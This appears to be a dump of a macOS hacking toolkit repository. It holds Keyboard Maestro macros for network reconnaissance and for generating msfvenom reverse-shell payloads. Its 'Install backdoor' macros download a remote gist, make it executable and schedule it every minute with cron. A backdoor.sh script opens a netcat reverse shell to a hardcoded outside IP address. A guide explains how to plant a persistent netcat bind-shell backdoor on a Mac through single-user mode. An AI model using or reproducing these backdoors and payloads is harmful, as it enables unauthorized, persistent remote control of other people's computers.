38E2E2BB-5898-4929-A43E-8913B5596750 558 | UID 559 | EFD562F2-5884-4E9D-A278-1CB94FE88046 560 | 561 | 562 | Activate 563 | Normal 564 | CreationDate 565 | 603207196.43601894 566 | CustomIconData 567 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 568 | Macros 569 | 570 | 571 | Actions 572 | 573 | 574 | Buttons 575 | 576 | 577 | Button 578 | OK 579 | 580 | 581 | Button 582 | Cancel 583 | Cancel 584 | 585 | 586 | 587 | MacroActionType 588 | PromptForUserInput 589 | Prompt 590 | Scan for open ports on a local network or public domain and IP. The two parameters are require. PORT can be a range of ports 591 | TimeOutAbortsMacro 592 | 593 | Title 594 | Port Scaning with NetCat 595 | Variables 596 | 597 | 598 | Default 599 | %Variable%RHOST% 600 | Variable 601 | RHOST 602 | 603 | 604 | Default 605 | 1-2000 606 | Variable 607 | PORTS 608 | 609 | 610 | Default 611 | 0|1 612 | Variable 613 | check UDP ports 614 | 615 | 616 | Default 617 | 0|1 618 | Variable 619 | verbose 620 | 621 | 622 | 623 | 624 | Conditions 625 | 626 | ConditionList 627 | 628 | 629 | ConditionType 630 | Variable 631 | Variable 632 | verbose 633 | VariableConditionType 634 | Is 635 | VariableValue 636 | 1 637 | 638 | 639 | ConditionListMatch 640 | All 641 | 642 | ElseActions 643 | 644 | 645 | Conditions 646 | 647 | ConditionList 648 | 649 | 650 | ConditionType 651 | Variable 652 | Variable 653 | check UDP ports 654 | VariableConditionType 655 | Is 656 | VariableValue 657 | 1 658 | 659 | 660 | ConditionListMatch 661 | All 662 | 663 | ElseActions 664 | 665 | 666 | Action 667 | ByPasting 668 | MacroActionType 669 | InsertText 670 | Text 671 | nc -zn %Variable%RHOST% %Variable%PORTS% 672 | 673 | 674 | MacroActionType 675 | IfThenElse 676 | ThenActions 677 | 678 | 679 | Action 680 | ByPasting 681 | MacroActionType 682 | InsertText 683 | Text 684 | nc -znu %Variable%RHOST% %Variable%PORTS% 685 | 686 | 687 | TimeOutAbortsMacro 688 | 689 | 690 | 691 | MacroActionType 692 | IfThenElse 693 | ThenActions 694 | 695 | 696 | Conditions 697 | 698 | ConditionList 699 | 700 | 701 | ConditionType 702 | Variable 703 | Variable 704 | check UDP ports 705 | VariableConditionType 706 | Is 707 | VariableValue 708 | 1 709 | 710 | 711 | ConditionListMatch 712 | All 713 | 714 | ElseActions 715 | 716 | 717 | Action 718 | ByPasting 719 | MacroActionType 720 | InsertText 721 | Text 722 | nc -znv %Variable%RHOST% %Variable%PORTS% 723 | 724 | 725 | MacroActionType 726 | IfThenElse 727 | ThenActions 728 | 729 | 730 | Action 731 | ByPasting 732 | MacroActionType 733 | InsertText 734 | Text 735 | nc -znvu %Variable%RHOST% %Variable%PORTS% 736 | 737 | 738 | TimeOutAbortsMacro 739 | 740 | 741 | 742 | TimeOutAbortsMacro 743 | 744 | 745 | 746 | IsDisclosed 747 | 748 | KeyCode 749 | 36 750 | MacroActionType 751 | SimulateKeystroke 752 | Modifiers 753 | 0 754 | ReleaseAll 755 | 756 | TargetApplication 757 | 758 | TargetingType 759 | Front 760 | 761 | 762 | CreationDate 763 | 603238576.69605899 764 | CustomIconData 765 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 766 | ModificationDate 767 | 604377700.28512299 768 | Name 769 | Scan PORTS (active) 770 | Triggers 771 | 772 | 773 | MacroTriggerType 774 | StatusMenu 775 | 776 | 777 | UID 778 | E611E7E7-2BAF-435E-BD53-95950A0532C1 779 | 780 | 781 | Name 782 | Information gathering 783 | Targeting 784 | 785 | Targeting 786 | Included 787 | TargetingApps 788 | 789 | 790 | BundleIdentifier 791 | com.apple.Terminal 792 | Name 793 | Terminal 794 | NewFile 795 | /System/Applications/Utilities/Terminal.app 796 | 797 | 798 | BundleIdentifier 799 | com.googlecode.iterm2 800 | Name 801 | iTerm 802 | NewFile 803 | /Applications/iTerm.app 804 | 805 | 806 | 807 | ToggleMacroUID 808 | 38E2E2BB-5898-4929-A43E-8913B5596750 809 | UID 810 | EFD562F2-5884-4E9D-A278-1CB94FE88046 811 | 812 | 813 | Activate 814 | Normal 815 | CreationDate 816 | 603207196.43601894 817 | CustomIconData 818 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 819 | Macros 820 | 821 | 822 | Actions 823 | 824 | 825 | Buttons 826 | 827 | 828 | Button 829 | OK 830 | 831 | 832 | Button 833 | Cancel 834 | Cancel 835 | 836 | 837 | 838 | MacroActionType 839 | PromptForUserInput 840 | Prompt 841 | Enter a network interface or use default value: 842 | TimeOutAbortsMacro 843 | 844 | Title 845 | ARP cache 846 | Variables 847 | 848 | 849 | Default 850 | en0 851 | Variable 852 | iface 853 | 854 | 855 | 856 | 857 | Conditions 858 | 859 | ConditionList 860 | 861 | 862 | ConditionType 863 | Variable 864 | Variable 865 | iface 866 | VariableConditionType 867 | IsNotEmpty 868 | VariableValue 869 | value 870 | 871 | 872 | ConditionListMatch 873 | All 874 | 875 | ElseActions 876 | 877 | 878 | Action 879 | ByPasting 880 | MacroActionType 881 | InsertText 882 | Text 883 | arp -i en0 -l -a 884 | 885 | 886 | MacroActionType 887 | IfThenElse 888 | ThenActions 889 | 890 | 891 | Action 892 | ByPasting 893 | MacroActionType 894 | InsertText 895 | Text 896 | arp -i %Variable%iface% -l -a 897 | 898 | 899 | TimeOutAbortsMacro 900 | 901 | 902 | 903 | IsDisclosed 904 | 905 | KeyCode 906 | 36 907 | MacroActionType 908 | SimulateKeystroke 909 | Modifiers 910 | 0 911 | ReleaseAll 912 | 913 | TargetApplication 914 | 915 | TargetingType 916 | Front 917 | 918 | 919 | CreationDate 920 | 603207220.833902 921 | CustomIconData 922 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 923 | ModificationDate 924 | 603384853.43131101 925 | Name 926 | ARP cache 927 | Triggers 928 | 929 | 930 | MacroTriggerType 931 | StatusMenu 932 | 933 | 934 | UID 935 | 48BC43C1-647C-4EED-80E6-B1CD8CEBDB23 936 | 937 | 938 | Name 939 | Information gathering 940 | Targeting 941 | 942 | Targeting 943 | Included 944 | TargetingApps 945 | 946 | 947 | BundleIdentifier 948 | com.apple.Terminal 949 | Name 950 | Terminal 951 | NewFile 952 | /System/Applications/Utilities/Terminal.app 953 | 954 | 955 | BundleIdentifier 956 | com.googlecode.iterm2 957 | Name 958 | iTerm 959 | NewFile 960 | /Applications/iTerm.app 961 | 962 | 963 | 964 | ToggleMacroUID 965 | 38E2E2BB-5898-4929-A43E-8913B5596750 966 | UID 967 | EFD562F2-5884-4E9D-A278-1CB94FE88046 968 | 969 | 970 | Activate 971 | Normal 972 | CreationDate 973 | 603207196.43601894 974 | CustomIconData 975 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 976 | Macros 977 | 978 | 979 | Actions 980 | 981 | 982 | Buttons 983 | 984 | 985 | Button 986 | OK 987 | Cancel 988 | 989 | 990 | 991 | Button 992 | All 993 | Cancel 994 | 995 | 996 | 997 | Button 998 | Cancel 999 | Cancel 1000 | 1001 | 1002 | 1003 | MacroActionType 1004 | PromptForUserInput 1005 | Prompt 1006 | Enter something if you want to filter the results: 1007 | TimeOutAbortsMacro 1008 | 1009 | Title 1010 | Active process 1011 | Variables 1012 | 1013 | 1014 | Default 1015 | 1016 | Variable 1017 | FILTER 1018 | 1019 | 1020 | 1021 | 1022 | Conditions 1023 | 1024 | ConditionList 1025 | 1026 | 1027 | ConditionType 1028 | Variable 1029 | Variable 1030 | Result Button 1031 | VariableConditionType 1032 | Is 1033 | VariableValue 1034 | OK 1035 | 1036 | 1037 | ConditionListMatch 1038 | All 1039 | 1040 | ElseActions 1041 | 1042 | 1043 | Conditions 1044 | 1045 | ConditionList 1046 | 1047 | 1048 | ConditionType 1049 | Variable 1050 | Variable 1051 | FILTER 1052 | VariableConditionType 1053 | IsNotEmpty 1054 | VariableValue 1055 | value 1056 | 1057 | 1058 | ConditionListMatch 1059 | All 1060 | 1061 | ElseActions 1062 | 1063 | 1064 | Action 1065 | ByPasting 1066 | MacroActionType 1067 | InsertText 1068 | Text 1069 | ps -ax 1070 | 1071 | 1072 | MacroActionType 1073 | IfThenElse 1074 | ThenActions 1075 | 1076 | 1077 | Action 1078 | ByPasting 1079 | MacroActionType 1080 | InsertText 1081 | Text 1082 | ps -ax | grep %Variable%FILTER% 1083 | 1084 | 1085 | TimeOutAbortsMacro 1086 | 1087 | 1088 | 1089 | MacroActionType 1090 | IfThenElse 1091 | ThenActions 1092 | 1093 | 1094 | Conditions 1095 | 1096 | ConditionList 1097 | 1098 | 1099 | ConditionType 1100 | Variable 1101 | Variable 1102 | FILTER 1103 | VariableConditionType 1104 | IsNotEmpty 1105 | VariableValue 1106 | value 1107 | 1108 | 1109 | ConditionListMatch 1110 | All 1111 | 1112 | ElseActions 1113 | 1114 | 1115 | Action 1116 | ByPasting 1117 | MacroActionType 1118 | InsertText 1119 | Text 1120 | ps -a 1121 | 1122 | 1123 | MacroActionType 1124 | IfThenElse 1125 | ThenActions 1126 | 1127 | 1128 | Action 1129 | ByPasting 1130 | MacroActionType 1131 | InsertText 1132 | Text 1133 | ps -ax | grep %Variable%FILTER% 1134 | 1135 | 1136 | TimeOutAbortsMacro 1137 | 1138 | 1139 | 1140 | TimeOutAbortsMacro 1141 | 1142 | 1143 | 1144 | IsDisclosed 1145 | 1146 | KeyCode 1147 | 36 1148 | MacroActionType 1149 | SimulateKeystroke 1150 | Modifiers 1151 | 0 1152 | ReleaseAll 1153 | 1154 | TargetApplication 1155 | 1156 | TargetingType 1157 | Front 1158 | 1159 | 1160 | CreationDate 1161 | 603207220.833902 1162 | CustomIconData 1163 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1164 | ModificationDate 1165 | 603680641.58131504 1166 | Name 1167 | Active process 1168 | Triggers 1169 | 1170 | 1171 | MacroTriggerType 1172 | StatusMenu 1173 | 1174 | 1175 | UID 1176 | 188A55B4-16CD-45E7-8F65-DF1ADFF5B7ED 1177 | 1178 | 1179 | Name 1180 | Information gathering 1181 | Targeting 1182 | 1183 | Targeting 1184 | Included 1185 | TargetingApps 1186 | 1187 | 1188 | BundleIdentifier 1189 | com.apple.Terminal 1190 | Name 1191 | Terminal 1192 | NewFile 1193 | /System/Applications/Utilities/Terminal.app 1194 | 1195 | 1196 | BundleIdentifier 1197 | com.googlecode.iterm2 1198 | Name 1199 | iTerm 1200 | NewFile 1201 | /Applications/iTerm.app 1202 | 1203 | 1204 | 1205 | ToggleMacroUID 1206 | 38E2E2BB-5898-4929-A43E-8913B5596750 1207 | UID 1208 | EFD562F2-5884-4E9D-A278-1CB94FE88046 1209 | 1210 | 1211 | Activate 1212 | Normal 1213 | CreationDate 1214 | 603207196.43601894 1215 | CustomIconData 1216 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1217 | Macros 1218 | 1219 | 1220 | Actions 1221 | 1222 | 1223 | Buttons 1224 | 1225 | 1226 | Button 1227 | OK 1228 | 1229 | 1230 | Button 1231 | Cancel 1232 | Cancel 1233 | 1234 | 1235 | 1236 | IsActive 1237 | 1238 | MacroActionType 1239 | PromptForUserInput 1240 | Prompt 1241 | Enter a network interface or use default value: 1242 | TimeOutAbortsMacro 1243 | 1244 | Title 1245 | Get local IP 1246 | Variables 1247 | 1248 | 1249 | Default 1250 | en0 1251 | Variable 1252 | iface 1253 | 1254 | 1255 | 1256 | 1257 | Action 1258 | ByPasting 1259 | MacroActionType 1260 | InsertText 1261 | Text 1262 | ipconfig getifaddr en0 1263 | 1264 | 1265 | Action 1266 | ByPasting 1267 | IsActive 1268 | 1269 | MacroActionType 1270 | InsertText 1271 | Text 1272 | ipconfig getifaddr %Variable%iface% 1273 | 1274 | 1275 | IsDisclosed 1276 | 1277 | KeyCode 1278 | 36 1279 | MacroActionType 1280 | SimulateKeystroke 1281 | Modifiers 1282 | 0 1283 | ReleaseAll 1284 | 1285 | TargetApplication 1286 | 1287 | TargetingType 1288 | Front 1289 | 1290 | 1291 | CreationDate 1292 | 603384736.16882503 1293 | CustomIconData 1294 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1295 | ModificationDate 1296 | 603431360.34979701 1297 | Name 1298 | Get local IP 1299 | Triggers 1300 | 1301 | 1302 | MacroTriggerType 1303 | StatusMenu 1304 | 1305 | 1306 | UID 1307 | 79B9F67B-ACB6-4B4C-B814-EE84AAF44F06 1308 | 1309 | 1310 | Name 1311 | Information gathering 1312 | Targeting 1313 | 1314 | Targeting 1315 | Included 1316 | TargetingApps 1317 | 1318 | 1319 | BundleIdentifier 1320 | com.apple.Terminal 1321 | Name 1322 | Terminal 1323 | NewFile 1324 | /System/Applications/Utilities/Terminal.app 1325 | 1326 | 1327 | BundleIdentifier 1328 | com.googlecode.iterm2 1329 | Name 1330 | iTerm 1331 | NewFile 1332 | /Applications/iTerm.app 1333 | 1334 | 1335 | 1336 | ToggleMacroUID 1337 | 38E2E2BB-5898-4929-A43E-8913B5596750 1338 | UID 1339 | EFD562F2-5884-4E9D-A278-1CB94FE88046 1340 | 1341 | 1342 | Activate 1343 | Normal 1344 | CreationDate 1345 | 603207196.43601894 1346 | CustomIconData 1347 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1348 | Macros 1349 | 1350 | 1351 | Actions 1352 | 1353 | 1354 | Buttons 1355 | 1356 | 1357 | Button 1358 | OK 1359 | 1360 | 1361 | Button 1362 | Cancel 1363 | Cancel 1364 | 1365 | 1366 | 1367 | MacroActionType 1368 | PromptForUserInput 1369 | Prompt 1370 | Choose the tool you want to use. The opendns method works if your ISP doesn't replace DNS requests (which it shouldn't). 1371 | TimeOutAbortsMacro 1372 | 1373 | Title 1374 | Get external IP 1375 | Variables 1376 | 1377 | 1378 | Default 1379 | opendns|ipify 1380 | Variable 1381 | select your tool 1382 | 1383 | 1384 | 1385 | 1386 | Conditions 1387 | 1388 | ConditionList 1389 | 1390 | 1391 | ConditionType 1392 | Variable 1393 | Variable 1394 | select your tool 1395 | VariableConditionType 1396 | Is 1397 | VariableValue 1398 | opendns 1399 | 1400 | 1401 | ConditionListMatch 1402 | All 1403 | 1404 | ElseActions 1405 | 1406 | 1407 | Action 1408 | ByPasting 1409 | MacroActionType 1410 | InsertText 1411 | Text 1412 | curl -s https://api.ipify.org && echo 1413 | 1414 | 1415 | MacroActionType 1416 | IfThenElse 1417 | ThenActions 1418 | 1419 | 1420 | Action 1421 | ByPasting 1422 | MacroActionType 1423 | InsertText 1424 | Text 1425 | dig +short myip.opendns.com @resolver1.opendns.com 1426 | 1427 | 1428 | TimeOutAbortsMacro 1429 | 1430 | 1431 | 1432 | IsDisclosed 1433 | 1434 | KeyCode 1435 | 36 1436 | MacroActionType 1437 | SimulateKeystroke 1438 | Modifiers 1439 | 0 1440 | ReleaseAll 1441 | 1442 | TargetApplication 1443 | 1444 | TargetingType 1445 | Front 1446 | 1447 | 1448 | CreationDate 1449 | 603384736.16882503 1450 | CustomIconData 1451 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 1452 | ModificationDate 1453 | 603385946.64691997 1454 | Name 1455 | Get external IP 1456 | Triggers 1457 | 1458 | 1459 | MacroTriggerType 1460 | StatusMenu 1461 | 1462 | 1463 | UID 1464 | C4746C77-BDD8-4CD8-A67A-6B7DCA020B70 1465 | 1466 | 1467 | Name 1468 | Information gathering 1469 | Targeting 1470 | 1471 | Targeting 1472 | Included 1473 | TargetingApps 1474 | 1475 | 1476 | BundleIdentifier 1477 | com.apple.Terminal 1478 | Name 1479 | Terminal 1480 | NewFile 1481 | /System/Applications/Utilities/Terminal.app 1482 | 1483 | 1484 | BundleIdentifier 1485 | com.googlecode.iterm2 1486 | Name 1487 | iTerm 1488 | NewFile 1489 | /Applications/iTerm.app 1490 | 1491 | 1492 | 1493 | ToggleMacroUID 1494 | 38E2E2BB-5898-4929-A43E-8913B5596750 1495 | UID 1496 | EFD562F2-5884-4E9D-A278-1CB94FE88046 1497 | 1498 | 1499 | 1500 | -------------------------------------------------------------------------------- /ressources/macros/Metasploit Macros.kmmacros: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Activate 7 | Normal 8 | CreationDate 9 | 603248839.71637106 10 | CustomIconData 11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 12 | Macros 13 | 14 | 15 | Actions 16 | 17 | 18 | Action 19 | ByPasting 20 | MacroActionType 21 | InsertText 22 | Text 23 | msfdb init && msfconsole 24 | 25 | 26 | IsDisclosed 27 | 28 | KeyCode 29 | 36 30 | MacroActionType 31 | SimulateKeystroke 32 | Modifiers 33 | 0 34 | ReleaseAll 35 | 36 | TargetApplication 37 | 38 | TargetingType 39 | Front 40 | 41 | 42 | CreationDate 43 | 603158737.91990697 44 | CustomIconData 45 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 46 | ModificationDate 47 | 604530521.83623803 48 | Name 49 | Open metasploit 50 | Triggers 51 | 52 | 53 | MacroTriggerType 54 | StatusMenu 55 | 56 | 57 | UID 58 | 5A71A45C-870B-4ED1-A4F2-A85F6B9BB0D7 59 | 60 | 61 | Name 62 | Metasploit 63 | Targeting 64 | 65 | Targeting 66 | Included 67 | TargetingApps 68 | 69 | 70 | BundleIdentifier 71 | com.apple.Terminal 72 | Name 73 | Terminal 74 | NewFile 75 | /System/Applications/Utilities/Terminal.app 76 | 77 | 78 | BundleIdentifier 79 | com.googlecode.iterm2 80 | Name 81 | iTerm 82 | NewFile 83 | /Applications/iTerm.app 84 | 85 | 86 | 87 | ToggleMacroUID 88 | BD3A91E8-F9C6-479E-A719-8FFE5B74C03F 89 | UID 90 | B24AC723-6106-4902-8682-F49EDDB71CDD 91 | 92 | 93 | Activate 94 | Normal 95 | CreationDate 96 | 603248839.71637106 97 | CustomIconData 98 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 99 | Macros 100 | 101 | 102 | Actions 103 | 104 | 105 | Buttons 106 | 107 | 108 | Button 109 | OK 110 | 111 | 112 | Button 113 | Cancel 114 | Cancel 115 | 116 | 117 | 118 | MacroActionType 119 | PromptForUserInput 120 | Prompt 121 | Please enter the details for these variables. (filename is optional) 122 | 123 | TimeOutAbortsMacro 124 | 125 | Title 126 | Create payload 127 | Variables 128 | 129 | 130 | Default 131 | %Variable%LHOST% 132 | Variable 133 | LHOST 134 | 135 | 136 | Default 137 | %Variable%LPORT% 138 | Variable 139 | LPORT 140 | 141 | 142 | Default 143 | cmd/unix/reverse_netcat|cmd/unix/reverse_bash|cmd/unix/reverse_python|cmd/unix/reverse_ruby|cmd/unix/bind_netcat|python/shell_bind_tcp|python/shell_reverse_tcp|python/meterpreter/reverse_tcp 144 | Variable 145 | Payload 146 | 147 | 148 | Default 149 | %Variable%Filename% 150 | Variable 151 | Filename 152 | 153 | 154 | 155 | 156 | Conditions 157 | 158 | ConditionList 159 | 160 | 161 | ConditionType 162 | Variable 163 | Variable 164 | Filename 165 | VariableConditionType 166 | IsEmpty 167 | VariableValue 168 | value 169 | 170 | 171 | ConditionListMatch 172 | All 173 | 174 | ElseActions 175 | 176 | 177 | Action 178 | ByPasting 179 | MacroActionType 180 | InsertText 181 | Text 182 | msfvenom -p %Variable%Payload% lhost=%Variable%LHOST% lport=%Variable%LPORT% > /tmp/%Variable%Filename% && sudo mv /tmp/%Variable%Filename% /Library/WebServer/Documents/%Variable%Filename% 183 | 184 | 185 | MacroActionType 186 | IfThenElse 187 | ThenActions 188 | 189 | 190 | Action 191 | ByPasting 192 | MacroActionType 193 | InsertText 194 | Text 195 | msfvenom -p %Variable%Payload% lhost=%Variable%LHOST% lport=%Variable%LPORT% 196 | 197 | 198 | TimeOutAbortsMacro 199 | 200 | 201 | 202 | IsDisclosed 203 | 204 | KeyCode 205 | 36 206 | MacroActionType 207 | SimulateKeystroke 208 | Modifiers 209 | 0 210 | ReleaseAll 211 | 212 | TargetApplication 213 | 214 | TargetingType 215 | Front 216 | 217 | 218 | CreationDate 219 | 603158737.91990697 220 | CustomIconData 221 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 222 | ModificationDate 223 | 604517561.09793901 224 | Name 225 | Create Payload (metasploit) 226 | Triggers 227 | 228 | 229 | MacroTriggerType 230 | StatusMenu 231 | 232 | 233 | UID 234 | AFEA5F8A-5CAA-43A3-BEB0-E9D2BEC262F2 235 | 236 | 237 | Name 238 | Metasploit 239 | Targeting 240 | 241 | Targeting 242 | Included 243 | TargetingApps 244 | 245 | 246 | BundleIdentifier 247 | com.apple.Terminal 248 | Name 249 | Terminal 250 | NewFile 251 | /System/Applications/Utilities/Terminal.app 252 | 253 | 254 | BundleIdentifier 255 | com.googlecode.iterm2 256 | Name 257 | iTerm 258 | NewFile 259 | /Applications/iTerm.app 260 | 261 | 262 | 263 | ToggleMacroUID 264 | BD3A91E8-F9C6-479E-A719-8FFE5B74C03F 265 | UID 266 | B24AC723-6106-4902-8682-F49EDDB71CDD 267 | 268 | 269 | Activate 270 | Normal 271 | CreationDate 272 | 603248839.71637106 273 | CustomIconData 274 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 275 | Macros 276 | 277 | 278 | Actions 279 | 280 | 281 | Action 282 | ByPasting 283 | MacroActionType 284 | InsertText 285 | Text 286 | load msgrpc ServerHost=127.0.0.1 Pass=abc123 SSL=y 287 | 288 | 289 | IsDisclosed 290 | 291 | KeyCode 292 | 36 293 | MacroActionType 294 | SimulateKeystroke 295 | Modifiers 296 | 0 297 | ReleaseAll 298 | 299 | TargetApplication 300 | 301 | TargetingType 302 | Front 303 | 304 | 305 | CreationDate 306 | 604345820.90336394 307 | CustomIconData 308 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 309 | ModificationDate 310 | 604529118.67077398 311 | Name 312 | Beef integration (metasploit) 313 | Triggers 314 | 315 | 316 | MacroTriggerType 317 | StatusMenu 318 | 319 | 320 | UID 321 | 4D1540A1-836A-4B71-AA1B-9693D44FF3B0 322 | 323 | 324 | Name 325 | Metasploit 326 | Targeting 327 | 328 | Targeting 329 | Included 330 | TargetingApps 331 | 332 | 333 | BundleIdentifier 334 | com.apple.Terminal 335 | Name 336 | Terminal 337 | NewFile 338 | /System/Applications/Utilities/Terminal.app 339 | 340 | 341 | BundleIdentifier 342 | com.googlecode.iterm2 343 | Name 344 | iTerm 345 | NewFile 346 | /Applications/iTerm.app 347 | 348 | 349 | 350 | ToggleMacroUID 351 | BD3A91E8-F9C6-479E-A719-8FFE5B74C03F 352 | UID 353 | B24AC723-6106-4902-8682-F49EDDB71CDD 354 | 355 | 356 | 357 | -------------------------------------------------------------------------------- /ressources/macros/README.md: -------------------------------------------------------------------------------- 1 | # Macros 2 | 3 | Useful macros to automate this repository's exploits. (compatible with keyboard maestro) -------------------------------------------------------------------------------- /ressources/macros/Remote terminal Macros.kmmacros: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Activate 7 | Normal 8 | CreationDate 9 | 603140665.49842894 10 | CustomIconData 11 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 12 | Macros 13 | 14 | 15 | Actions 16 | 17 | 18 | Action 19 | ByPasting 20 | MacroActionType 21 | InsertText 22 | Text 23 | curl https://gist.githubusercontent.com/NicolasGrimonpont/d038314198876bfe25d2dc34fac525b6/raw/0b269f5dfb8976d3cd633414084aa8c5b70f72e0/gistfile1.txt > /users/shared/db; chmod 777 /users/shared/db 24 | 25 | 26 | IsDisclosed 27 | 28 | KeyCode 29 | 36 30 | MacroActionType 31 | SimulateKeystroke 32 | Modifiers 33 | 0 34 | ReleaseAll 35 | 36 | TargetApplication 37 | 38 | TargetingType 39 | Front 40 | 41 | 42 | MacroActionType 43 | Pause 44 | Time 45 | 0.5 46 | TimeOutAbortsMacro 47 | 48 | 49 | 50 | Action 51 | ByPasting 52 | MacroActionType 53 | InsertText 54 | Text 55 | echo "* * * * * /users/shared/db" > /tmp/cron; crontab /tmp/cron; rm /tmp/cron 56 | 57 | 58 | IsDisclosed 59 | 60 | KeyCode 61 | 36 62 | MacroActionType 63 | SimulateKeystroke 64 | Modifiers 65 | 0 66 | ReleaseAll 67 | 68 | TargetApplication 69 | 70 | TargetingType 71 | Front 72 | 73 | 74 | CreationDate 75 | 603158737.91990697 76 | CustomIconData 77 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 78 | ModificationDate 79 | 610596097.01093602 80 | Name 81 | Install backdoor (user) 82 | Triggers 83 | 84 | 85 | MacroTriggerType 86 | StatusMenu 87 | 88 | 89 | UID 90 | 827BB293-7DE1-4CA4-9977-661C1B3353BF 91 | 92 | 93 | Name 94 | Remote terminal 95 | Targeting 96 | 97 | Targeting 98 | Included 99 | TargetingApps 100 | 101 | 102 | BundleIdentifier 103 | com.apple.Terminal 104 | Name 105 | Terminal 106 | NewFile 107 | /System/Applications/Utilities/Terminal.app 108 | 109 | 110 | BundleIdentifier 111 | com.googlecode.iterm2 112 | Name 113 | iTerm 114 | NewFile 115 | /Applications/iTerm.app 116 | 117 | 118 | 119 | ToggleMacroUID 120 | 570F5871-E330-417C-9E7A-0D67E902C1C8 121 | UID 122 | 482E9655-1457-43EC-85DD-C6B142E11DBA 123 | 124 | 125 | Activate 126 | Normal 127 | CreationDate 128 | 603140665.49842894 129 | CustomIconData 130 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 131 | Macros 132 | 133 | 134 | Actions 135 | 136 | 137 | Action 138 | ByPasting 139 | MacroActionType 140 | InsertText 141 | Text 142 | curl https://gist.githubusercontent.com/NicolasGrimonpont/d038314198876bfe25d2dc34fac525b6/raw/0b269f5dfb8976d3cd633414084aa8c5b70f72e0/gistfile1.txt > /etc/db && chmod 777 /etc/db 143 | 144 | 145 | IsDisclosed 146 | 147 | KeyCode 148 | 36 149 | MacroActionType 150 | SimulateKeystroke 151 | Modifiers 152 | 0 153 | ReleaseAll 154 | 155 | TargetApplication 156 | 157 | TargetingType 158 | Front 159 | 160 | 161 | MacroActionType 162 | Pause 163 | Time 164 | 0.5 165 | TimeOutAbortsMacro 166 | 167 | 168 | 169 | Action 170 | ByPasting 171 | MacroActionType 172 | InsertText 173 | Text 174 | echo "* * * * * /etc/db" > /tmp/cron && crontab /tmp/cron && rm /tmp/cron 175 | 176 | 177 | IsDisclosed 178 | 179 | KeyCode 180 | 36 181 | MacroActionType 182 | SimulateKeystroke 183 | Modifiers 184 | 0 185 | ReleaseAll 186 | 187 | TargetApplication 188 | 189 | TargetingType 190 | Front 191 | 192 | 193 | CreationDate 194 | 603158737.91990697 195 | CustomIconData 196 | KMEP-GenericApplication-/System/Applications/Utilities/Terminal.app 197 | ModificationDate 198 | 610596069.15278399 199 | Name 200 | Install backdoor (root) 201 | Triggers 202 | 203 | 204 | MacroTriggerType 205 | StatusMenu 206 | 207 | 208 | UID 209 | E7E0A8A2-3494-4A31-BDCC-AED8AFFAA590 210 | 211 | 212 | Name 213 | Remote terminal 214 | Targeting 215 | 216 | Targeting 217 | Included 218 | TargetingApps 219 | 220 | 221 | BundleIdentifier 222 | com.apple.Terminal 223 | Name 224 | Terminal 225 | NewFile 226 | /System/Applications/Utilities/Terminal.app 227 | 228 | 229 | BundleIdentifier 230 | com.googlecode.iterm2 231 | Name 232 | iTerm 233 | NewFile 234 | /Applications/iTerm.app 235 | 236 | 237 | 238 | ToggleMacroUID 239 | 570F5871-E330-417C-9E7A-0D67E902C1C8 240 | UID 241 | 482E9655-1457-43EC-85DD-C6B142E11DBA 242 | 243 | 244 | 245 | -------------------------------------------------------------------------------- /system/exploitation/backdoor.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | n=$(ps aux | grep -o [1]234) 4 | 5 | if [[ $n = "" ]]; then 6 | mkfifo /tmp/f; 7 | nc 51.210.47.127 1234 0/tmp/f 2>&1; 8 | rm /tmp/f 9 | fi -------------------------------------------------------------------------------- /system/exploitation/host_DNS_enum.sh: -------------------------------------------------------------------------------- 1 | # quick script to get IP addresses from a predefined domain list text file. 2 | 3 | #create a file called domains.txt and exec the following one-liner script. 4 | for url in $(cat domains.txt); do host $url; done | grep "has address" | cut -d " " -f 4 | sort -u 5 | -------------------------------------------------------------------------------- /system/exploitation/payloads/bash.md: -------------------------------------------------------------------------------- 1 | Create a backdoor on MacOs with a Bash payload: 2 | 3 | Start MacOs on Single-User Mode (no password require): 4 | 5 | CMD + S 6 | 7 | Check the Disk: 8 | 9 | /sbin/fsck -fy 10 | 11 | Mount the Hard Drive: 12 | 13 | /sbin/mount –uw / 14 | 15 | Create the Netcat Listener: 16 | 17 | nano /etc/payload 18 | 19 | Payload script (changing ip): 20 | 21 | #!/bin/bash 22 | n=$(ps aux | grep -o [1]234) 23 | 24 | if [[ $n = "" ]]; then 25 | mkfifo f 26 | nc -l 0.0.0.0 1234 < f | /bin/bash -i > f 2>&1 27 | fi 28 | 29 | The Netcat listener will open port 1234 on the macOS device. The first line (n=$(ps aux | grep -o [1]234)), creates a variable n, which checks to see if port 1234 is already open. This port detection is achieved using ps, a tool used to view running background processes. 30 | 31 | The following line (if [[ $n = "" ]]; then) is the start of an if statement which says if the variable n (port 1234) is not found, mkfifo, a tool used to create a "named pipe," will create a file called f. The filename here is totally arbitrary and uses "f" for simplicity. 32 | 33 | Following mkfifo is the Netcat command (nc -l 0.0.0.0 1234 < f | /bin/bash -i > f 2>&1), which opens port 1234 on every available IPv4 interface (0.0.0.0) and uses the f file to pipe terminal commands to and from the backdoored device. 34 | 35 | 36 | Use Cron to Execute the Script: 37 | 38 | env EDITOR=nano crontab -e 39 | * * * * * /etc/payload (configure cron task) 40 | 41 | crontab -l > mycron 42 | echo "* * * * * /etc/payload" >> mycron 43 | crontab mycron 44 